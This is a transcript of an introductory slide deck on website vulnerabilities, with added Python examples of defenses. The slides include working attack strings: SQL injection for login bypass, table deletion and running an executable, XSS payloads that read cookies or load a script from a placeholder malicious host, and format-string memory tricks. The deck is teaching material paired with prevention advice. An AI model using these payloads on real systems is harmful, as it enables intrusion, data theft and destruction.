
SECURITY VULNERABILITIES IN WEBSITES

Date post: 14-Feb-2016
Upload: paiva
SECURITY VULNERABILITIES IN WEBSITES by Brian Vees
Transcript
Page 1: SECURITY VULNERABILITIES IN WEBSITES

SECURITY VULNERABILITIES IN WEBSITES

by Brian Vees

Page 2: SECURITY VULNERABILITIES IN WEBSITES

Five Types of Vulnerabilities

- SQL Injection
- Username Enumeration
- Cross Site Scripting (XSS)
- Remote Code Execution
- String Formatting Vulnerabilities

Page 3: SECURITY VULNERABILITIES IN WEBSITES

SQL Injection

- A very common and easy-to-exploit vulnerability
- Requires basic SQL knowledge

The basic idea:

- Find a user-inputted field that most likely is used to query a database
- Insert text in the field which will then merge with the SQL query being executed
- Examine the results to gain info about the database
- Using this info, write better queries to receive potentially private data

Page 4: SECURITY VULNERABILITIES IN WEBSITES

SQL Injection - Example

Given a sample login prompt on a webpage, the query to validate the username might look like this:

query = "select * from user where username='" + tbUserName.Text + "'";

Entering a single apostrophe “breaks out” of the intended SQL code, allowing other code to be executed

Page 5: SECURITY VULNERABILITIES IN WEBSITES

SQL Injection – Example (Cont.)

Entering this data causes the following query to be sent to the database:

select * from user where username='' or 1=1 --'

Since 1=1 is always true, this query returns all users in the database

Page 6: SECURITY VULNERABILITIES IN WEBSITES

Other Examples

- SQL injection to obtain error messages containing useful data
- SQL injection to delete data ('drop [tablename]--)
- SQL injection to execute files: exec sp_oamethod @o, 'run', NULL, 'executable.exe'

Page 7: SECURITY VULNERABILITIES IN WEBSITES

SQL Injection Prevention

- “Escape” apostrophes
- String replacement on SQL-specific character combinations (“--”)
- Safest: reject any bad input rather than attempting to “cleanse” it
- Not necessarily plausible: names like O’Brien and other valid input contain apostrophes
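
The O'Brien problem above goes away when the input is bound as a query parameter instead of being spliced into the SQL text. The following is an added example, not code from the original slides: it uses Python's sqlite3 module with a constructed in-memory table (the rows and the email column are assumptions) to run the slide's concatenated query beside a parameterized one.

```python
import sqlite3

def make_db():
    """Build an in-memory 'user' table holding constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("create table user (username text, email text)")
    db.executemany(
        "insert into user values (?, ?)",
        [("alice", "alice@example.test"),
         ("bob", "bob@example.test"),
         ("O'Brien", "obrien@example.test")],
    )
    return db

def find_user_concat(db, name):
    """Vulnerable: the slide's pattern, input becomes part of the SQL text."""
    query = "select * from user where username='" + name + "'"
    return db.execute(query).fetchall()

def find_user_param(db, name):
    """Hardened: the driver sends name as data, so quotes have no SQL meaning."""
    return db.execute(
        "select * from user where username=?", (name,)
    ).fetchall()

if __name__ == "__main__":
    db = make_db()
    slide_input = "' or 1=1 --"   # the input shown on the slide
    print("concat:", len(find_user_concat(db, slide_input)), "rows")
    print("param: ", len(find_user_param(db, slide_input)), "rows")
    print("param O'Brien:", find_user_param(db, "O'Brien"))
    try:
        find_user_concat(db, "O'Brien")
    except sqlite3.OperationalError as exc:
        # A legitimate name breaks the concatenated query with a syntax error.
        print("concat O'Brien:", exc)
```
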

Page 8: SECURITY VULNERABILITIES IN WEBSITES

Username Enumeration

A very simple method of finding valid usernames

[Figure panels: Invalid Username | Valid Username]

Page 9: SECURITY VULNERABILITIES IN WEBSITES

Username Enumeration Prevention

Use the same error message for invalid password and invalid username

This way an attacker has no idea whether or not the username is correct
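
One way to implement the single error message, as an added example that is not from the original slides. The account store, function names and messages are assumptions. It goes one step beyond the slide: an unknown username is still run through the password hash against a dummy record, so the response time does not reveal what the message hides.

```python
import hashlib
import hmac
import os

GENERIC_ERROR = "Invalid username or password"

def _hash(password, salt):
    """Slow salted hash (PBKDF2-HMAC-SHA256) used for stored passwords."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_user_store():
    """Constructed sample store: username -> (salt, password hash)."""
    salt = os.urandom(16)
    return {"alice": (salt, _hash("correct horse", salt))}

# Dummy record so that unknown usernames cost the same work as known ones.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash("placeholder", _DUMMY_SALT)

def login(store, username, password):
    """Return (ok, message); a failure never says which field was wrong."""
    known = username in store
    salt, expected = store.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    candidate = _hash(password, salt)
    # compare_digest avoids leaking how many bytes of the hash matched.
    matches = hmac.compare_digest(candidate, expected)
    if known and matches:
        return (True, "Welcome")
    return (False, GENERIC_ERROR)

if __name__ == "__main__":
    store = make_user_store()
    print(login(store, "alice", "correct horse"))
    print(login(store, "alice", "wrong"))    # valid username, bad password
    print(login(store, "nobody", "wrong"))   # invalid username, same reply
```
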

Page 10: SECURITY VULNERABILITIES IN WEBSITES

Cross Site Scripting

- Another type of code injection, but with client-side script
- Can be used to bypass client-side security, as well as gain other information (session cookies)
- Yahoo! and even Google have previously fallen victim to this vulnerability

Page 11: SECURITY VULNERABILITIES IN WEBSITES

XSS Example

- This form echoes what the user entered in the case of an invalid login (i.e. invalid characters)
- What if we input JavaScript?

Page 12: SECURITY VULNERABILITIES IN WEBSITES

Why Is XSS Dangerous?

Consider if we now input the following code:

<script>alert(document.cookie)</script>

With this data, we can bypass cookie-based security

Also, external, lengthier scripts can be injected:

<script src="http://www.malicioussite.com/javascript.src"></script>

Page 13: SECURITY VULNERABILITIES IN WEBSITES

XSS Prevention

- User input cleansing
- Don’t echo user input back unless it is necessary
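
When the input does have to be echoed, as in the invalid-login form above, encoding it for the HTML context it lands in is what makes it harmless. The following is an added example, not code from the original slides; the page markup and function names are assumptions. It renders the slide's input both raw and HTML-encoded, in element text and in an attribute value.

```python
import html

def render_error_raw(username):
    """Vulnerable: echoes the input straight into the page markup."""
    return "<p>Invalid characters in username: " + username + "</p>"

def render_error_encoded(username):
    """Hardened: <, >, & and both quote characters become HTML entities."""
    safe = html.escape(username, quote=True)
    return (
        "<p>Invalid characters in username: " + safe + "</p>"
        # quote=True matters here: the value is re-filled into an attribute.
        '<input name="username" value="' + safe + '">'
    )

if __name__ == "__main__":
    slide_input = "<script>alert(document.cookie)</script>"
    print(render_error_raw(slide_input))      # browser would run the script
    print(render_error_encoded(slide_input))  # browser shows it as text
```
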

Page 14: SECURITY VULNERABILITIES IN WEBSITES

Remote Code Execution

- Potentially the most dangerous vulnerability
- Stems from insecure settings on a web server

Page 15: SECURITY VULNERABILITIES IN WEBSITES

Remote Code Execution Example

- In PHP, the register_globals setting is often set to “on” to ease development
- This allows for global variables to be set remotely

require($page . ".php");

If $page is not initialized, any arbitrary file can be included and will be executed on that server

Page 16: SECURITY VULNERABILITIES IN WEBSITES

XML Vulnerabilities

- There are several XML specifications that are also vulnerable to remote code execution
- Improperly validated XML can “break out” of the XML, and execute malicious code

Page 17: SECURITY VULNERABILITIES IN WEBSITES

Remote Code Execution Prevention

Ensure web server configuration is secure (namely, if using PHP, turn register_globals off)

Validate user input

Page 18: SECURITY VULNERABILITIES IN WEBSITES

String Formatting Vulnerabilities

An attack on server-side functions that can perform formatting (such as C’s printf)

Special characters are used to read or write sections of memory that normally would not be accessible

Page 19: SECURITY VULNERABILITIES IN WEBSITES

String Formatting Example

- %s can be used to continue reading data off the stack until an illegal memory address is attempted to be accessed, crashing the program
- %x can be used to print areas of memory that are normally not accessible
- %d, %u, and %x can be used to overwrite the instruction pointer, allowing the execution of user-defined code

Page 20: SECURITY VULNERABILITIES IN WEBSITES

String Formatting Vulnerability Prevention

- Make sure to verify all user input
- Replace or reject special characters (“%”)

Page 21: SECURITY VULNERABILITIES IN WEBSITES

Conclusion

What is the golden rule that will stop the majority of these website attacks?

Validate User Input!

